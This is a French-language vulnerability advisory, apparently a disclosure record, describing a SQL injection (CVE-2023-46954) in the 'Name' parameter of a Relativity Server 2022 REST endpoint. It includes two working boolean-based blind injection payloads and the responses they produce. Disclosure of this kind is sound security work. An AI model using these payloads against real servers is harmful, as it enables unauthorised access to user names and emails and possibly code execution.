
Exploit de preuve de concept pour CVE-2023-46954, une vulnérabilité d'injection SQL à distance dans Relativity Server 2022 permettant l'exécution de code arbitraire via le paramètre Name.
Vulnérabilité d'injection SQL dans Relativity Server 2022 v.12.1.537.3 Patch 2 et versions antérieures permet à un attaquant distant d'exécuter du code arbitraire via le paramètre name.
[Type de vulnérabilité] Injection SQL
[Vendeur du produit] Relativity ODA LLC
[Base de code du produit affecté] Relativity Server 2022 v.12.1.537.3 Patch 2 et versions antérieures
[Composant affecté] POST /Relativity.Rest/API/Relativity.Users/workspace//users/retrieveusersby
[Type d'attaque] À distance
[Impact Exécution de code] true
[Vecteurs d'attaque] Dans le paramètre JSON POST 'Name', la charge utile suivante renverra true et affichera une liste de noms et d'e-mails :
(SELECT (CASE WHEN (1=1) THEN 03586 ELSE 3*(SELECT 2 UNION ALL SELECT 1) END))
Mais la charge utile suivante renverra false et affichera le message 'SQL Statement Failed' :
(SELECT (CASE WHEN (1=2) THEN 03586 ELSE 3*(SELECT 2 UNION ALL SELECT 1) END))
Remarque : la comparaison True/False a lieu dans la clause CASE WHEN ().
[Référence] https://www.linkedin.com/in/jakedmurphy1/
[Le vendeur a-t-il confirmé ou reconnu la vulnérabilité ?] true
[Découvreur] Jake Murphy